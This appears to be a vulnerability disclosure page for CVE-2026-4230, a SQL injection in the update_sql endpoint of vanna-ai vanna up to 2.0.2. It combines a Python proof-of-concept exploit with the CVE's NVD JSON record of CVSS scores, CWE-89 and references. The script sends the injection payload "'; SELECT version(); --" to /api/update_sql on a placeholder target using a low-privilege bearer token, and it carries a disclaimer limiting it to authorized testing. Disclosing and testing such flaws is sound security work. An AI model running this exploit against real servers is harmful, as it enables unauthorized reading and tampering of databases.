CVE-2026-4230

#!/usr/bin/env python3 """ CVE-2026-4230 PoC - vanna-ai SQL Injection in update_sql function Note: This is for educational and authorized testing purposes only. """ import requests import json TARGET_URL = "http://target-server:5000" # Replace with actual target def exploit_sql_injection(): """ Exploit SQL injection in vanna-ai update_sql function This PoC demonstrates extracting database version information """ # Malicious payload to extract database version # Adjust payload based on target database type (MySQL, PostgreSQL, etc.) payload = "'; SELECT version(); --" # Target endpoint for update_sql function endpoint = f"{TARGET_URL}/api/update_sql" # Prepare malicious request headers = { "Content-Type": "application/json", "Authorization": "Bearer <low-privilege-token>" # Requires low privilege access } data = { "sql_query": payload, "session_id": "test_session" } print(f"[*] Sending malicious request to {endpoint}") print(f"[*] Payload: {payload}") try: response = requests.post(endpoint, json=data, headers=headers, timeout=10) print(f"[*] Response Status: {response.status_code}") print(f"[*] Response Body: {response.text}") if response.status_code == 200: print("[+] Request successful - potential SQL injection confirmed") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": print("CVE-2026-4230 PoC - vanna-ai SQL Injection") print("=" * 50) exploit_sql_injection()

{"cve": {"id": "CVE-2026-4230", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:16.513", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in vanna-ai vanna up to 2.0.2. Affected is the function update_sql of the file src/vanna/legacy/flask/__init__.py of the component Endpoint. Such manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una vulnerabilidad ha sido encontrada en vanna-ai vanna hasta 2.0.2. Afectada es la función update_sql del archivo src/vanna/legacy/flask/__init__.py del componente Endpoint. Tal manipulación conduce a inyección SQL. El ataque puede ser lanzado remotamente. El exploit ha sido divulgado al público y puede ser usado. El proveedor fue contactado tempranamente sobre esta divulgación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://gist.github.com/YLChen-007/48b86c2365e5ebf6923d5f14491b4329", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351153", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351153", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.771215", "source": "[email protected]"}]}}